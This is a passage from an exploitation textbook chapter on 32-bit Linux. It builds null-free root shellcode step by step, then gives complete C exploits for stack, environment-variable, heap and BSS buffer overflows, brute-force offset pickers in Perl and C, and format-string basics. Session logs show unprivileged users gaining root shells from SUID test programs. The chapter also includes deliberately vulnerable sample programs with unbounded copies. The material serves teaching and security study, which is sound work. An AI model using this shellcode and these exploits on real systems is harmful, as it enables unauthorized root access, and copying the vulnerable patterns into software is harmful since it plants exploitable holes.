0x804cbd0 <_exit>:      mov    %ebx,%edx
0x804cbd2 <_exit+2>:    mov    0x4(%esp,1),%ebx
0x804cbd6 <_exit+6>:    mov    $0x1,%eax
0x804cbdb <_exit+11>:   int    $0x80
0x804cbdd <_exit+13>:   mov    %edx,%ebx
0x804cbdf <_exit+15>:   cmp    $0xfffff001,%eax
0x804cbe4 <_exit+20>:   jae    0x8054260 <__syscall_error>
End of assembler dump.
(gdb)





In Linux, kernel calls are made through interrupt 0x80 (int $0x80), with the number of the system call stored in the %eax register (e.g., mov $0x1, %eax) and the call's arguments, if any, stored in the %ebx, %ecx, and %edx registers. Each system call has a unique number; for example, 0x1 for _exit and 0xb for execve (see Listings 13.5 and 13.7). The numbers of other Linux system calls are stored in the /usr/include/asm/unistd.h file (see Listing 13.8).





Listing 13.8. The numbers of the first 30 Linux system calls 





#ifndef _ASM_I386_UNISTD_H_
#define _ASM_I386_UNISTD_H_

/* This file contains the system call numbers. */

#define __NR_exit          1
#define __NR_fork          2
#define __NR_read          3
#define __NR_write         4
#define __NR_open          5
#define __NR_close         6
#define __NR_waitpid       7
#define __NR_creat         8
#define __NR_link          9
#define __NR_unlink       10
#define __NR_execve       11
#define __NR_chdir        12
#define __NR_time         13
#define __NR_mknod        14
#define __NR_chmod        15
#define __NR_lchown       16
#define __NR_break        17
#define __NR_oldstat      18
#define __NR_lseek        19
#define __NR_getpid       20
#define __NR_mount        21
#define __NR_umount       22
#define __NR_setuid       23
#define __NR_getuid       24
#define __NR_stime        25
#define __NR_ptrace       26
#define __NR_alarm        27
#define __NR_oldfstat     28
#define __NR_pause        29
#define __NR_utime        30





The execve() function takes three parameters, which, as already mentioned, are passed in the %ebx, %ecx, and %edx registers. The prototype of execve() (see man execve) looks as follows:


int execve(const char *filename, char *const argv[], char *const envp[]);


Thus, the %ebx register contains a pointer to the name of the file to launch, filename (in this case, /bin/sh). The %ecx register holds a pointer to a string array, the argv[] arguments (in this case, argv[0] = "/bin/sh" and argv[1] = NULL). The %edx register holds a pointer to an array of key=value strings, which represent the program's environment. To keep things simple, it is set to NULL in the shellcode. My comments to Listing 13.5 give details about the values stored in different registers.

The _exit() call takes a single argument, the exit status, which is passed in %ebx (see Listing 13.7); apart from loading it, only two instructions are of interest here:

movl $0x1, %eax

int $0x80

You cannot know in advance at which address the shellcode will be located after it is passed to the vulnerable application. So how do you reference the data inside the shellcode? This problem is solved using the following trick: when a call instruction is executed, the address of the instruction immediately following it (the return address) is pushed onto the stack. So if the /bin/sh file name is placed right after the call instruction, once the call is executed you will be able to pop the address of the string off the stack. Listing 13.9 shows how this can be done.





Listing 13.9. Obtaining the address of the /bin/sh file name 





        jmp   line
address:
        popl  %esi

        (Shellcode)
line:
        call  address
        /bin/sh








In this way, the address of /bin/sh is saved in the %esi register. This is enough to build the argument array right after the string: its first element (the address of /bin/sh) is stored at %esi + 8 (the length of the /bin/sh\0 string), and its second element, a 32-bit NULL, at %esi + 12. This is done as follows:

popl %esi

movl %esi, 0x8(%esi)

movl $0x00, 0xc(%esi)
But here you will run into a problem. You will pass the shellcode to the strcpy() function, which copies a string until it encounters a null character (a zero byte). The shellcode, therefore, must contain no zero bytes. You can get rid of the zeros in the movl $0x00, 0xc(%esi) instruction by replacing it with the following two instructions:

xorl %eax, %eax

movl %eax, 0xc(%esi)

Zeros in the shellcode, however, can only be detected after the instructions are converted into machine code and viewed in hexadecimal format. For example, take the following instruction:

0x804cbd6 <_exit+6>: mov $0x1,%eax

In hexadecimal notation, it looks like the following:

b8 01 00 00 00    mov $0x1,%eax

To get rid of all the zeros, various tricks are used, such as zeroing a register and then incrementing it by one, as in the following code fragment:

xorl %ebx, %ebx    ; %ebx = 0

movl %ebx, %eax    ; %eax = 0

inc %eax           ; %eax = 1

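If you recall, the /bin/sh\0 string in the shellcode ends with a 0 byte. To keep this byte out of the shellcode, the terminating zero is written at run time by the following instruction (%eax already contains 0 at this point):

/* movb works only with 1 byte, so the low byte %al is used. */

movb %al, 0x07(%esi)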


Now, you can write a preliminary version of the shellcode (Listing 13.10). 





Listing 13.10. The preliminary shellcode 





/* shellcode2.c */

int main()
{
    asm("jmp line\n"
        "address:\n"
        "popl %esi\n"
        "movl %esi, 0x8(%esi)\n"
        "xorl %eax, %eax\n"
        "movl %eax, 0xc(%esi)\n"
        "movb %al, 0x7(%esi)\n"
        "movb $0xb, %al\n"
        "movl %esi, %ebx\n"
        "leal 0x8(%esi), %ecx\n"
        "leal 0xc(%esi), %edx\n"
        "int $0x80\n"

        "xorl %ebx, %ebx\n"
        "movl %ebx, %eax\n"
        "inc %eax\n"
        "int $0x80\n"

        "line:\n"
        "call address\n"
        ".string \"/bin/sh\"\n");
}





Compile the source code using the following command:

# gcc shellcode2.c -o shellcode2

Then examine its hexadecimal dump for the presence of 0 bytes using the objdump utility:
# objdump -D ./shellcode2

Listing 13.11 shows the part of the code of interest here. 





Listing 13.11. The hexadecimal values of the shellcode 





08048430 <main>:
 8048430:   55                   push   %ebp
 8048431:   89 e5                mov    %esp,%ebp
 8048433:   eb 1f                jmp    8048454 <line>

08048435 <address>:
 8048435:   5e                   pop    %esi
 8048436:   89 76 08             mov    %esi,0x8(%esi)
 8048439:   31 c0                xor    %eax,%eax
 804843b:   89 46 0c             mov    %eax,0xc(%esi)
 804843e:   88 46 07             mov    %al,0x7(%esi)
 8048441:   b0 0b                mov    $0xb,%al
 8048443:   89 f3                mov    %esi,%ebx
 8048445:   8d 4e 08             lea    0x8(%esi),%ecx
 8048448:   8d 56 0c             lea    0xc(%esi),%edx
 804844b:   cd 80                int    $0x80
 804844d:   31 db                xor    %ebx,%ebx
 804844f:   89 d8                mov    %ebx,%eax
 8048451:   40                   inc    %eax
 8048452:   cd 80                int    $0x80

08048454 <line>:
 8048454:   e8 dc ff ff ff       call   8048435 <address>
 8048459:   2f                   das
 804845a:   62 69 6e             bound  %ebp,0x6e(%ecx)
 804845d:   2f                   das
 804845e:   73 68                jae    80484c8 <gcc2_compiled.+0x18>
 8048460:   00 5d c3             add    %bl,0xffffffc3(%ebp)





The instructions starting from address 8048459 are actually the hexadecimal ASCII codes of the characters of the /bin/sh string:

 /  b  i  n  /  s  h

2f 62 69 6e 2f 73 68
As you can see, the code has no zeros, so you can start testing it. However, simply launching shellcode2 from the command line will result in a core dump. The shellcode writes to the memory right after the /bin/sh string, and in this program that memory lies in the read-only .text section, whereas the shellcode is intended to be run on the stack. This limitation can be circumvented with the program shown in Listing 13.12.


Listing 13.12. The program for testing the shellcode 





char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main()
{
    void (*shell)() = (void *)shellcode;
    shell();
    return 0;
}

Compiling and running this program opens a shell, which tells you that there are no errors in the shellcode:

# gcc shellcode3.c -o shellcode3

# ./shellcode3

sh-2.04# exit

#

Because the vulnerable program may have the root SUID bit set, most known shellcodes include the setuid(0) and setgid(0) calls. These calls set root privileges: uid=0(root) and gid=0(root). In hexadecimal notation, these calls look as shown in Listings 13.13 and 13.14.





Listing 13.13. The setuid call 





char setuid[] =
"\x31\xc0"     /* xorl %eax, %eax */
"\x31\xdb"     /* xorl %ebx, %ebx */
"\xb0\x17"     /* movb $0x17, %al */
"\xcd\x80";    /* int $0x80       */


Listing 13.14. The setgid call 


char setgid[] =
"\x31\xc0"     /* xorl %eax, %eax */
"\x31\xdb"     /* xorl %ebx, %ebx */
"\xb0\x2e"     /* movb $0x2e, %al */
"\xcd\x80";    /* int $0x80       */


By adding these instructions at the beginning of the shellcode, you obtain a full-fledged shellcode that not only launches a shell but also sets the user and group identifiers to zero. The final version of the shellcode is shown in Listing 13.15. Note that if the root SUID bit is not set in the target program, the setuid(0) and setgid(0) calls will fail, but this will not affect the further execution of the shellcode.





Listing 13.15. The final shellcode 





char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"    /* setuid(0) */
"\x31\xc0\x31\xdb\xb0\x2e\xcd\x80"    /* setgid(0) */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff"
"/bin/sh";





13.1.4. Constructing the Exploit 


Now you can start writing the actual exploit. Linux exploits have two main ways of passing 
a shellcode to a target application: 


- Using a vulnerable buffer
- Using an environment variable


I consider both of these methods and a third, nonstandard method that involves placing 
a shellcode in the heap. 


13.1.4.1. Passing a Shellcode Using a Vulnerable Buffer 


As already mentioned, the return address of the vulnerable function must be overwritten with
the address of the shellcode. The most popular way is to pass the shellcode to the buffer of the
vulnerable application and rewrite the return address to point to the beginning of this buffer.
Listing 13.17 shows an exploit that implements this technique. The exploit builds the string
shown in Fig. 13.2 to be passed to the vulnerable application.


[ NOP NOP NOP ... | Shellcode | RET RET RET ... ]   (200 bytes in total)


Fig. 13.2. The string built by the exploit


The RET entries are successive copies of the return address pointing to the shellcode, and the
NOP entries are no-operation instructions (opcode 0x90). A run of such instructions is called
a NOP sled. In this case, the shellcode is located approximately in the middle of the string.
The string will be placed into the vulnerable buffer as shown in Fig. 13.3.
[Diagram: the shellcode inside the vulnerable buffer; the stack top (%esp) is marked]


Fig. 13.3. Placing the shellcode in the vulnerable buffer


The buffer in the exploit must be larger than the buffer in the vulnerable application
(200 bytes versus 100 bytes) to guarantee that the return address is overwritten; moreover, the
shellcode must lie entirely before or after the location of the function return address and must
not overlap it. The NOP instructions spare you from calculating the exact address at which the
shellcode begins, which is not an easy task: the return address only has to point somewhere near
the start of the buffer. If execution lands anywhere in the NOP sled, the processor executes the
NOP instructions one after another and then reaches the shellcode. The return address can be
calculated with the help of the esp register, which always points to the top of the stack, in
other words, to the last item saved to the stack. The address of the stack top (the contents of
the esp register) can be determined using the function whose source code is shown in Listing 13.16.





Listing 13.16. The function to determine the top of the stack (%esp) 


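unsigned long get_sp(void)
{
    unsigned long sp;

    /* Copy the current stack pointer into sp (GCC inline assembly, 32-bit x86) */
    __asm__ __volatile__("movl %%esp, %0" : "=r"(sp));
    return sp;
}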





However, the address of the stack top can change, sometimes substantially, after
the execl() call at the end of the exploit executes; consequently, the value of %esp that you
determined may no longer point to the top of the stack. Thus, you can only calculate an
approximate return address, for which the following instruction is placed at the beginning
of the exploit:


ret = esp - offset; 
Here, offset is specified manually as a command line argument:

offset = atoi(argv[1]);


With some luck, this lets you land in the NOP sled and thus reach the start of the shellcode.
Later, I show you how to automate the process of determining the return address.

For now, check how the exploit works. Use the chmod ug+s stack_vuln command to set the
SUID and SGID bits of the vulnerable stack_vuln program, and then use the su nobody command
to switch to the unprivileged nobody user:


# gcc stack_vuln.c -o stack_vuln
# gcc expl_stack1.c -o expl_stack1
# chmod ug+s stack_vuln
# ls -la stack_vuln
-rwsr-sr-x 1 root root 13803 Apr 6 06:32 stack_vuln
# su nobody
sh-2.04$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody)
sh-2.04$ ./expl_stack1 0
The stack pointer (ESP) is: 0xbffff978
The offset from ESP is: 0x0
The return address is: 0xbffff978
OK!
sh-2.04# id
uid=0(root) gid=0(root) groups=99(nobody)
sh-2.04#


As you can see, I was very lucky: the necessary offset turned out to be 0; otherwise,
I could have spent a long time trying to pick the right value. To determine the overflow
offset, a simple shell script or Perl program can be devised. Listing 13.18 shows the source
code for such a program written in Perl. Quite often, such brute-force offset pickers are built
directly into exploits; an exploit with a built-in brute-force offset picker is considered
in Section 13.1.4.4.





Listing 13.17. Passing a shellcode using a vulnerable buffer (expl_stack1.c) 





#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"      /* setuid(0) */
"\x31\xc0\x31\xdb\xb0\x2e\xcd\x80"      /* setgid(0) */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff"
"/bin/sh";

/* Function to determine the top of the stack */
unsigned long get_sp(void)
{
    unsigned long sp;

    /* Copy the current stack pointer into sp (GCC inline assembly, 32-bit x86) */
    __asm__ __volatile__("movl %%esp, %0" : "=r"(sp));
    return sp;
}

int main(int argc, char *argv[])
{
    int i, offset;
    long esp, ret, *addr_ptr;
    char *ptr, buf[200];

    if (argc < 2) {
        fprintf(stderr, "Usage: %s <offset>\n", argv[0]);
        exit(-1);
    }

    /* Obtaining the offset from the command line argument */
    offset = atoi(argv[1]);

    /* Determining the stack top */
    esp = get_sp();

    /* Calculating the return address */
    ret = esp - offset;

    printf("The stack pointer (ESP) is: 0x%lx\n", esp);
    printf("The offset from ESP is: 0x%x\n", offset);
    printf("The return address is: 0x%lx\n", ret);

    ptr = buf;
    addr_ptr = (long *)ptr;

    /* Filling the buffer with the return address */
    for (i = 0; i < 200; i += 4)
        *(addr_ptr++) = ret;

    /* Filling the first 50 bytes of the buffer with NOP instructions
       (NOP sled) */
    for (i = 0; i < 50; i++)
        buf[i] = '\x90';

    ptr = buf + 50;
    /* Placing the shellcode after the NOP instructions */
    for (i = 0; i < (int)strlen(shellcode); i++)
        *(ptr++) = shellcode[i];

    /* Placing a zero into the last buffer cell */
    buf[200 - 1] = '\0';

    /* Running the program with the prepared buffer as an argument */
    execl("./stack_vuln", "stack_vuln", buf, (char *)NULL);

    return 0;
}
Listing 13.18. The offset picker (bruteret.pl)





#!/usr/bin/perl

for ($i = 1; $i < 1500; $i++) {
    print "Attempt $i\n";
    system("./expl_stack1 $i");
}


13.1.4.2. Passing a Shellcode Using an Environment Variable 


Listing 13.19 shows an exploit that also opens a system shell with root privileges, but its
operating principle is different. In Linux, the following data are stored downward from
address 0xc0000000:

- Right below 0xc0000000: 5 zero bytes
- Below them: the name of the executed file
- Below the file name: the environment variables (envp)


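The exploit stores the shellcode as an environment variable and determines its address using
the following formula:

ret = 0xc0000000 - 6 - file name length - shellcode length

The constant 6 covers the 5 zero bytes at the top of the stack plus the terminating zero of the
shellcode string.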

This will be the required return address. The exploit simply fills the buffer with copies of this
address, so that it also lands where the function return address is stored. It is not by accident
that the buffer covers the 124th, 125th, 126th, and 127th bytes: overwriting of the return address
starts from the 124th byte, as the following test shows:


# ./hole `perl -e 'print "A"x100'`
OK!
# ./hole `perl -e 'print "A"x123'`
OK!
# ./hole `perl -e 'print "A"x124'`
OK!
Segmentation fault (core dumped)


As you can see, entering 124 A characters crashes the program; consequently, the following 
4 bytes (124 through 127) are the function return address. Other details are described in the 
comments in the code (Listing 13.19). 





Listing 13.19. Passing a shellcode using an environment variable (expl_stack2.c) 


#include <stdio.h>
#include <string.h>
#include <unistd.h>

char shellcode[] =
"\x31\xc0"              /* xorl %eax, %eax */
"\x31\xdb"              /* xorl %ebx, %ebx */
"\xb0\x17"              /* movb $0x17, %al */
"\xcd\x80"              /* int $0x80 */
"\x31\xc0"              /* xorl %eax, %eax */
"\x31\xdb"              /* xorl %ebx, %ebx */
"\xb0\x2e"              /* movb $0x2e, %al */
"\xcd\x80"              /* int $0x80 */
"\x31\xc0"              /* xorl %eax, %eax */
"\x50"                  /* pushl %eax */
"\x68""//sh"            /* pushl $0x68732f2f */
"\x68""/bin"            /* pushl $0x6e69622f */
"\x89\xe3"              /* movl %esp, %ebx */
"\x50"                  /* pushl %eax */
"\x53"                  /* pushl %ebx */
"\x89\xe1"              /* movl %esp, %ecx */
"\x99"                  /* cltd */
"\xb0\x0b"              /* movb $0xb, %al */
"\xcd\x80";             /* int $0x80 */

int main(void)
{
    /* Preparing the environment for the target: its only string
       holds the shellcode */
    char *env[] = {shellcode, NULL};

    /* Preparing a character buffer for the overflow: 128 bytes of
       addresses plus a terminating zero */
    char buf[128 + 1];
    unsigned long ret, *ptr;    /* 4 bytes each on 32-bit x86 */
    int i;

    ptr = (unsigned long *)(buf);

    /* Calculating the address at which the shellcode will be located after
       the execle() function executes */
    ret = 0xc0000000 - 6 - strlen(shellcode) - strlen("./stack_vuln");

    /* Filling bytes 0 through 127 with the address; bytes 124 through 127
       hold the function return address */
    for (i = 0; i < 128; i += 4)
        *ptr++ = ret;
    buf[128] = '\0';

    /* Loading the target program with the prepared overflowing buffer and
       the shellcode in the environment variable */
    execle("./stack_vuln", "stack_vuln", buf, (char *)NULL, env);

    return 0;
}





13.1.4.3. Passing Shellcode Using the Heap 


Listing 13.20 shows the third version of the exploit, which places the shellcode in the heap and
fills the overflowing buffer with return addresses to the shellcode. The offset must be specified
on the command line (an offset of 1,000 works for me), so it is convenient to use the brute-force
script from Listing 13.18, after changing the program name expl_stack1 in it to expl_stack3.
Because this exploit places only return addresses, not the shellcode itself, into the target
buffer, it is more convenient to use: you do not have to worry whether the shellcode will fit
into the space before the return address. The idea for this exploit was authored by
crazy_einstein.
Listing 13.20. Passing a shellcode using the heap (expl_stack3.c)








#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
"\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
"\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
"/bin/sh";

unsigned long get_sp(void)
{
    unsigned long sp;

    /* Copy the current stack pointer into sp (GCC inline assembly, 32-bit x86) */
    __asm__ __volatile__("movl %%esp, %0" : "=r"(sp));
    return sp;
}

int main(int argc, char **argv)
{
    int i, offset;
    long esp, ret;
    char buf[500];
    char *egg, *ptr;
    char *av[3], *ev[2];

    if (argc < 2) {
        fprintf(stderr, "Usage: %s <offset>\n", argv[0]);
        exit(-1);
    }

    /* Obtaining the offset from the command line argument */
    offset = atoi(argv[1]);

    /* Determining the stack top */
    esp = get_sp();

    /* Calculating the return address */
    ret = esp + offset;

    printf("The stack pointer (ESP) is: 0x%lx\n", esp);
    printf("The offset from ESP is: 0x%x\n", offset);
    printf("The return address is: 0x%lx\n", ret);

    /* Allocating a buffer in the heap */
    egg = (char *)malloc(1000);
    if (egg == NULL) {
        perror("malloc");
        exit(-1);
    }

    /* Placing the "EGG=" string at the start of the buffer */
    sprintf(egg, "EGG=");

    /* Placing NOP instructions */
    memset(egg + 4, 0x90, 1000 - 1 - strlen(shellcode));

    /* Placing the shellcode (with its terminating zero) at the end of the buffer */
    sprintf(egg + 1000 - 1 - strlen(shellcode), "%s", shellcode);

    ptr = buf;

    /* Clearing the buffer in the stack */
    memset(buf, 0, sizeof(buf));

    /* Filling the buffer with return addresses; the last 4 bytes stay
       zero and terminate the string */
    for (i = 0; i < (int)sizeof(buf) - 4; i += 4)
        *(long *)(ptr + i) = ret;

    /* Running the vulnerable program with the prepared overflowing buffer
       as the argument and passing the shellcode in the heap as an
       environment variable */
    av[0] = "./stack_vuln";
    av[1] = buf;
    av[2] = NULL;
    ev[0] = egg;
    ev[1] = NULL;

    execve(av[0], av, ev);

    return 0;
}





13.1.4.4. Exploit with a Built-in Brute-Force Offset Picker 


In most situations, the easiest way to determine the offset for exploits is to use a separate
brute-force offset picker, like the one shown in Listing 13.18. But this will not work on systems
where Perl is not available or shell scripts cannot be executed. In this case, an offset picker is
built right into the exploit. Listing 13.21 shows an example of such an exploit: basically, it is
the exploit from Listing 13.20 with an offset picker added to it. The algorithm of this offset
picker is quite simple. At each loop iteration, a child process is spawned with fork(); in it, the
vulnerable program is executed with the overflowing buffer passed to it, while the parent process
waits for the result. The standard WIFEXITED() macro analyzes the status code to determine
whether the child process terminated abnormally, as a result of receiving a signal, or normally
(by calling the exit() function or returning from main()). In the latter case, the loop terminates
on the assumption that the shellcode executed successfully and a shell with root privileges was
opened. This is not, however, always the case; therefore, the loop may have to be run again with
another step. Sometimes the child process never terminates and the loop hangs; in this case,
terminate it with the <Ctrl>+<C> key combination and start over with another step value.

The offset step is passed to the exploit in the command line. The loop executes until offset 
becomes greater than 3,000 or whatever limit you set in the code. The remaining aspects of the 
exploit’s operation ought to be clear from the comments in the code. 





Listing 13.21. Exploit with a built-in brute-force offset picker (expl_brute.c) 





#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
"\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
"\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
"/bin/sh";

unsigned long get_sp(void)
{
    unsigned long sp;

    /* Copy the current stack pointer into sp (GCC inline assembly, 32-bit x86) */
    __asm__ __volatile__("movl %%esp, %0" : "=r"(sp));
    return sp;
}

int main(int argc, char *argv[])
{
    char buf[500];
    char *egg, *ptr;
    char *av[3], *ev[2];
    pid_t pid;
    int i, step, offset = 0;
    long esp, ret;
    int status;

    if (argc < 2) {
        fprintf(stderr, "Usage: %s <step>\n", argv[0]);
        exit(-1);
    }

    step = atoi(argv[1]);
    esp = get_sp();
    ret = esp;

    egg = (char *)malloc(1000);
    if (egg == NULL) {
        perror("malloc");
        exit(-1);
    }
    sprintf(egg, "EGG=");
    memset(egg + 4, 0x90, 1000 - 1 - strlen(shellcode));
    sprintf(egg + 1000 - 1 - strlen(shellcode), "%s", shellcode);

    ptr = buf;
    memset(buf, 0, sizeof(buf));

    /* Looping until the offset becomes greater than 3,000 */
    while (offset <= 3000)
    {
        /* Spawning a child process */
        if ((pid = fork()) == 0)
        {
            /* Filling the buffer with the new return addresses; the last
               4 bytes stay zero and terminate the string */
            for (i = 0; i < (int)sizeof(buf) - 4; i += 4)
                *(long *)(ptr + i) = ret;

            av[0] = "./stack_vuln";
            av[1] = buf;
            av[2] = NULL;
            ev[0] = egg;
            ev[1] = NULL;

            execve(av[0], av, ev);
            _exit(1);        /* Reached only if execve() fails */
        }
        if (pid < 0) {
            perror("fork");
            exit(-1);
        }

        /* Waiting for the child process to finish */
        wait(&status);

        /* Checking the returned value. If the value returned by the WIFEXITED()
           macro is not 0, the child process terminated normally; that is, the
           shellcode probably was executed successfully. If the returned value
           is 0, continue looping through possible offsets. */
        if (WIFEXITED(status) != 0) {
            fprintf(stderr, "The end: %#lx\n", ret);
            exit(-1);
        } else {
            ret += offset;
            offset += step;
            fprintf(stderr, "Trying offset %d, addr: %#lx\n", offset, ret);
        }
    }

    return 0;
}





13.2. BSS Buffer Overflow 


Exploits based on the BSS buffer overflow are significantly different from those based on the
stack buffer overflow. The main difference is that no function return addresses are stored in BSS,
so you cannot hope to overwrite them. But programs sometimes store function pointers in BSS, and
overwriting such a pointer has much the same effect as overwriting a function return address in
the stack. Consider an example of a vulnerable program (Listing 13.22).


Listing 13.22. A vulnerable program (bss_vuln.c) 








#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void show(char *);

int main(int argc, char *argv[])
{
    static char buf[100];
    static void (*func_ptr)(char *arg);

    if (argc < 2) {
        printf("Usage: %s <buffer data>\n", argv[0]);
        exit(1);
    }

    func_ptr = show;
    strncpy(buf, argv[1], strlen(argv[1]));    /* Vulnerable: no bound on buf */
    func_ptr(buf);

    return 0;
}

void show(char *arg)
{
    printf("\nBuffer: [%s]\n\n", arg);
}





In the program, a static buffer and a static function pointer are declared. Because both
variables are static and uninitialized, they are stored in the BSS segment. In this program, the
strncpy() call is limited by the length of the source string rather than by the size of the
receiving buffer, so it does not protect the buffer at all. This makes it possible to pass a string
of any length, which will overwrite the function pointer, for example, as follows:


# gcc bss_vuln.c -o bss_vuln
# ./bss_vuln `perl -e 'print "A"x100'`

Buffer: [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]

# ./bss_vuln `perl -e 'print "A"x101'`
Illegal instruction (core dumped)

As you can see, the program crashes only when the 101st byte is overwritten, which means that
the function pointer is located right after the buffer, that is, in the 101st, 102nd, 103rd, and
104th bytes.

The important point is that in the vulnerable program, a static buffer is declared before 
a static function pointer; otherwise, you will not be able to overwrite the pointer. 

Accordingly, the exploit must overflow the buffer and overwrite the function pointer with
the address of the shellcode. You could place the shellcode in the vulnerable buffer and then pass
control to it, as in the classic stack buffer overflow. However, you cannot use the ESP register
here, because it points to the stack top, whereas we are dealing with the BSS segment; therefore,
determining the shellcode address in this case is more difficult. Moreover, the 100 bytes
allocated to the buffer may not be enough to hold the shellcode. Thus, the easiest solution is to
place the shellcode in an environment variable and calculate its address, which is then written
over the function pointer. Listing 13.23 shows the source code implementing this method.
Listing 13.23. The BSS buffer overflow exploit (expl_bss.c)





#include <stdio.h>
#include <string.h>
#include <unistd.h>

char shellcode[] =
"\x31\xc0"              /* xorl %eax, %eax */
"\x31\xdb"              /* xorl %ebx, %ebx */
"\xb0\x17"              /* movb $0x17, %al */
"\xcd\x80"              /* int $0x80 */
"\x31\xc0"              /* xorl %eax, %eax */
"\x31\xdb"              /* xorl %ebx, %ebx */
"\xb0\x2e"              /* movb $0x2e, %al */
"\xcd\x80"              /* int $0x80 */
"\x31\xc0"              /* xorl %eax, %eax */
"\x50"                  /* pushl %eax */
"\x68""//sh"            /* pushl $0x68732f2f */
"\x68""/bin"            /* pushl $0x6e69622f */
"\x89\xe3"              /* movl %esp, %ebx */
"\x50"                  /* pushl %eax */
"\x53"                  /* pushl %ebx */
"\x89\xe1"              /* movl %esp, %ecx */
"\x99"                  /* cltd */
"\xb0\x0b"              /* movb $0xb, %al */
"\xcd\x80";             /* int $0x80 */

int main(void)
{
    char *env[] = {shellcode, NULL};
    char buf[104 + 1];          /* 104 bytes of addresses plus a terminating zero */
    unsigned long ret;
    unsigned long *ptr;         /* 4 bytes each on 32-bit x86 */
    int i;

    ptr = (unsigned long *)(buf);
    ret = 0xc0000000 - strlen(shellcode) - strlen("./bss_vuln") - 6;
    for (i = 0; i < 104; i += 4)
        *ptr++ = ret;
    buf[104] = '\0';

    execle("./bss_vuln", "bss_vuln", buf, (char *)NULL, env);

    return 0;
}








Here is how to check the exploit’s operation: 

# gcc bss_vuln.c -o bss_vuln
# gcc expl_bss.c -o expl_bss
# chmod ug+s ./bss_vuln
# ls -la ./bss_vuln
-rwsr-sr-x 1 root root 14170 Apr 10 01:59 ./bss_vuln
# su nobody
sh-2.04$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody)
sh-2.04$ ./expl_bss
sh-2.04# id
uid=0(root) gid=0(root) groups=99(nobody)
sh-2.04#
The source codes for the vulnerable program and the exploit can be found in the /PART
III/Chapter 13/13.2 directory on the accompanying CD-ROM.


13.3. Format String Vulnerability 


The format string exploit was presented to the public for the first time on June 22, 2000, when 
someone nicknamed tf8 published its source code in Bugtraq. The exploit takes advantage 
of a format string error in the wu-ftpd 2.6.0 FTP daemon to execute a shellcode to open 
a command shell with root privileges. Information about the vulnerability and the exploit it- 
self can be found at the SecurityFocus site (http://www.securityfocus.com/bid/1387). 

In the body of the exploit, there is this comment: VERY PRIVATE VERSION. DO NOT 
DISTRIBUTE. 15-10-1999. 

As you can see, the exploit was created in October 1999, meaning that hackers had been using
it for almost nine months before the general public became aware of it. Only when descriptions
of this vulnerability started to appear did software developers and security specialists start
paying attention to it, and the number of new exploits based on the format string error grew
rapidly. Here are just a few of the programs with format string errors for which exploits have
been written: lpr, ftpd, proftpd, telnetd, Linux rpc.statd, PHP versions 3 and 4, ypbind,
different versions of the libc library, BSD chpass, and so on.


13.3.1. Format String Fundamentals 


A format string is used by functions that format input or output data. The following is a list
of some of these functions:


printf(const char *format, ...);
fprintf(FILE *stream, const char *format, ...);
sprintf(char *str, const char *format, ...);
snprintf(char *str, size_t size, const char *format, ...);
vprintf(const char *format, va_list ap);
vfprintf(FILE *stream, const char *format, va_list ap);
scanf(const char *format, ...);
fscanf(FILE *stream, const char *format, ...);
syslog(int priority, const char *format, ...);


As you can see, quite a few functions convert data according to a format; most of them are part
of the American National Standards Institute (ANSI) C standard. Detailed information about each
function can be found in the corresponding man page.

Perhaps the most popular of these functions is printf(), which outputs formatted information.
Here is an example of its use:

printf("string = %s, int = %d\n", str, i);


In the preceding expression, "string = %s, int = %d\n" is the format string and str
and i are the function's parameters.
A format string can contain three types of objects:

- Regular characters, which are copied into the output stream
- Control sequences, also called escape sequences (see Table 13.1)
- Format specifiers, which always start with the % character and convert and output
  arguments in the specified order (see Table 13.2)


Table 13.1. Control sequences

Sequence | Meaning
\"       | Double quote
\\       | Backslash
\ooo     | Octal number
\xhh     | Hexadecimal number


Table 13.2. Format specifiers

Specifier | Argument type | Input or output data
%d, %i    | int           | A signed decimal integer
%o        | unsigned int  | An unsigned octal integer
%s        | char *        | String characters are output until the first occurrence of the \0 character
%f        | double        | A signed floating-point number of the [-]mmm.dddddd format, where the number of d digits is specified by the precision (by default, the precision is six places)
%e, %E    | double        | A signed floating-point number of the [-]m.dddddde[+|-]xx or [-]m.ddddddE[+|-]xx format, where the number of d digits is specified by the precision (by default, the precision is six places)
%g, %G    | double        | A signed floating-point number as in the case of %e, %E, or %f, but, depending on the specified value and precision, the trailing zeros and decimal point are only printed when necessary
%n        | int *         | The number of characters that have been printed out so far is stored in the argument
%%        | none          | No argument is converted; the % character itself is output





